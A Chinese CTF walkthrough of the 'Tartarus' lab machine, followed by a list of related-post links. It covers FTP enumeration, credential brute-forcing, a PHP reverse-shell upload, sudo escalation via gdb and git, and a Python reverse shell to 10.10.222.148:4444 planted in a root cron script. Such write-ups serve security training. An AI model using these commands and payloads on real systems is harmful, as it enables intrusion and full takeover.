Tartarus

这是基于服务的简单枚举和基本特权升级技术的新手靶场。基于杰克

Nmap扫一波全端口,开放了21,22,80端口

nmap -sV 10.10.48.224 -p-

用nmap -A 综合扫描一下,探测到FTP允许匿名登录

Anonymous FTP login allowed

里面有一个test.txt文件

nmap -A 10.10.48.224

FTP里有个test.txt文件 
ftp 10.10.48.224   #登录到ftp
输入用户名anonymous
密码直接回车登录
get下载到本地查看是个tfp测试文件 - -!    转战80端口

Web是个默认的apache2页面

先访问看下有没有robots.txt文件

有个/amdin-dir目录

访问一下有两个文件,打开类分别似于账号和密码,hydra走一波~

wget 加URL下载下来

hydra爆破了一波ftp和ssh居然没有一个成功的。。。不应该啊

dirbuster加dirb扫Web目录也没有发现能利用的目录

难道我漏了一些细节???

重新检查了一遍,发现FTP里有隐藏的文件,大意了

yougotgoodeyes.txt文件里记录了一个隐藏目录

访问/sUp3r-s3cr3t是个登录页面

用BurpSuite抓爆用Intruder爆破刚刚在Web获取的账号密码

这里爆破的模式选择Cluster bomb模式,设置好变量为username和password的值

设置好payload,加载刚刚获取的账号密码

start attack

有结果了

账号:enox    密码P@ssword1234

登录到后台,发现是个上传页面

上传一个phpinfo(),发现没有任何的过滤

但是。。。上传后的路径呢?没有显示!

还是得用dirbuster扫一波目录才行,上传到了/sUp3r-s3cr3t/images/uploads/目录下

访问一下,执行成功,下来上传shell

我上传的Shell是kali自带的,在/usr/share/webshells/php/php-reverse-shell.php

修改一下ip和端口。ip改成攻击机的就行

上传成功后用nc起监听,然后访问我们修改上传的shell,成功反弹回来

Linux一般都自带Python,我们用python生成一个交互式的shell

python -c 'import pty; pty.spawn("/bin/bash")'

注意到里面有个属于root的cleanup.py权限 777 文件,等下提权到root会用到

但是生成交互式的shell之后输入的命令就会出现重叠,虽然不好看但也不影响执行

后面我会分享怎么去掉命令重叠的这种情况

获取user.txt的flag

获取完flag 就准备提权了。sudo -l

查看到用户thirtytwo 可以执行gdb

https://gtfobins.github.io/这里有sudo,SUID各种提权方法,访问不了的话可能要。。。你懂的

sudo gdb -nx -ex '!sh' -ex quit

这个gdb只有thirtytwo执行。所以我们先要移动到该用户

sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit

移动成功后还是生成一个交互式的shell

成功移动到thirtytwo用户,查看一下sudo -l

是个d4rckh能执行的git SUDO提权,还是访问刚刚gtfobinsc网站查看对应的提权方法

sudo -u d4rckh /usr/bin/git -p help config    进入到编辑页面

然后输入!/bin/sh

成功移动到d4rckh

查看一下这个cleanup.py文件是个删除文件的脚本

猜想可能是个定时执行的脚本,查看下/etc/crontab,果然。

那我有可以修改的权限,把里面的内容替换成我们的fantanshell代码就可以获得root权限

先说下怎么去输入命令怎么去重叠,这会影响我们后面用nano修改cleanup.py

生成交互式的Shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
生成完后按Ctrl+Z,回到kali输入
$ stty raw -echo
$ fg
输入fg后敲两下回车
回到TTY后输入
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows 38 columns 116
搞定!

把下面的脚本替换进cleanup.py 里面

# -*- coding: utf-8 -*-
#!/usr/bin/env python
import socket, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.222.148", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.system("/bin/sh -i")

攻击机再用nc起个监听,稍后片刻就会弹回一个root的shell。
我是打完第二天才写的笔记,可能有些地方没有写进去。
后面的忘记截图了,抱歉!
到此结束
总结
以后进ftp的时候要用ls -la查看文件,不然会忽略掉一些关键的细节。

CTF靶机 Tartarus 笔记相关推荐

  1. [靶机渗透笔记] HACKADEMIC: RTB1

    靶机链接https://www.vulnhub.com/entry/hackademic-rtb1,17/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.200.129/24 扫 ...

  2. 隐写术简论——ctf公开课笔记记录

    隐写术 简述: 隐写 为 历史悠久的技术,属于 情报学 分支. 将某些特殊信息隐藏于正常载体之中,从而实现掩盖特殊信息存在的事实,在通信过程中隐蔽通信掩盖了秘密通信的行为,不易引起攻击者的怀疑. 消息 ...

  3. 攻防世界ctf题目fileinclude笔记

    根据提示,网站首页目录  /var/www/html/index.php ,   flag在flag.php中,右键查看源代码. @include处存在文件包含漏洞,变量从网站传过来的cookie确定 ...

  4. CTF基础(学习笔记)

    1.暴力破解 直接使用burpsuite破解即可 2.命令行注入 ping后面加入&&链接符:表示ping完这个网站之后再执行&只有的语句 3.CSRF:跨站请求伪造 我们点击 ...

  5. 取证导论 Volatility入门使用——ctf公开课笔记记录

    取证导论: 电子数据取证技术 是 对电子数据源里的电子数据证据进行发现.固定.提取.分析.检验.鉴定.出示.存档的全过程, 可以应用在 网络攻击窃密.反欺诈调查.内部审计.失泄密痕迹发现.恶意网站查处 ...

  6. 漏洞payload 靶机_hackme:2 靶机攻略

    原标题:hackme:2 靶机攻略 0x01 背景: hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中.内容丰富,贴近实战.而且没有太多的脑洞,适合安全工作者们用来练习渗 ...

  7. 零基础如何学习Web安全渗透测试?推荐这份史上最详细的自学路线图!

    第 1 阶段 Web 技术入门 1.0 学习导论 此阶段,我们的学习目标是了解网络安全行业的法律法规 / 学习方法 / 求职目标,搭建属于自己的博客 / 论坛 / 网站(成为一名站长).掌握 Web ...

  8. CFT学习资源与工具上新

    点击"仙网攻城狮"关注我们哦~ 不当想研发的渗透人不是好运维 让我们每天进步一点点 简介 CTF基础,资料太多太杂不知道该怎么学,学习CTF有什么用?学习CTF最主要的是学习思路关 ...

  9. 安全攻防 | 内网漫游之SOCKS代理总结

    ## 0x01引言 ## 在实际渗透过程中,我们成功入侵了目标服务器.接着我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口.内网网站8080端口等等 ...

最新文章

  1. Maven(二):常用命令、依赖管理
  2. 如何提升代码可读性?阿里发布16条设计规约
  3. [BUUCTF-pwn]——hgame2018_flag_server
  4. Linux16.04安装Matlab2016b详细教程
  5. 安装kerberos报错 error: command 'gcc' failed with exit status 1
  6. rfc mail content-type
  7. Kinect开发笔记之八C#实现Kinect声音的追踪
  8. “约见”面试官系列之常见面试题第三十七篇之CSS3新属性(建议收藏)
  9. nlp cs224n 学习笔记1 Introduction and Word Vectors
  10. NVIDIA将全面支持笔记本混合显卡技术
  11. JavaScript的类型自动转换高级玩法JSFuck
  12. bootstrap思想总结_bootstrap学习心得总结-css样式设计分享
  13. python递归函数代码_python – 进行深度优先搜索的递归函数
  14. 动态创建和移除HTML标签
  15. ps排版html,排版教程,超详细适合初学者的排版教程
  16. 【Pyecharts | Scatter】气泡图实现 / 1990 与 2015 年各国家人均寿命与GDP
  17. 报错:WebMvcConfigurer.class cannot be opened because it does not exist
  18. 基于Yahoo网站性能优化的34条军规及自己的见解
  19. css 从右到左的方向调整
  20. 吉林大学计算机系高级语言程序设计(C语言)期末题目及解答(上)

热门文章

  1. linux ubuntu bionic,[下载]Ubuntu 18.04.2 LTS (Bionic Beaver)发布
  2. Tkinter模块GUI界面化编程实战(四)——随机点名小程序(含详解及完整源码、完整程序下载链接)
  3. 中秋被各大厂的月饼秀到了!快和小编看看这些大厂到底发的什么月饼吧!!!不知道有没有被惊讶到的?
  4. JAVA并发十二连招
  5. 【Lua基础】Lua入门24式
  6. kalixfce不能启动_kali安装xfce,Xfce软件包详细解释
  7. 近日流行香港各大网站的葡萄牙灵异车祸事件~~
  8. Java图形化界面设计(swing实现)
  9. Android matrix 控制图片的旋转、缩放、移动
  10. okcc和vos3000呼叫中心外呼系统两者间有什么作用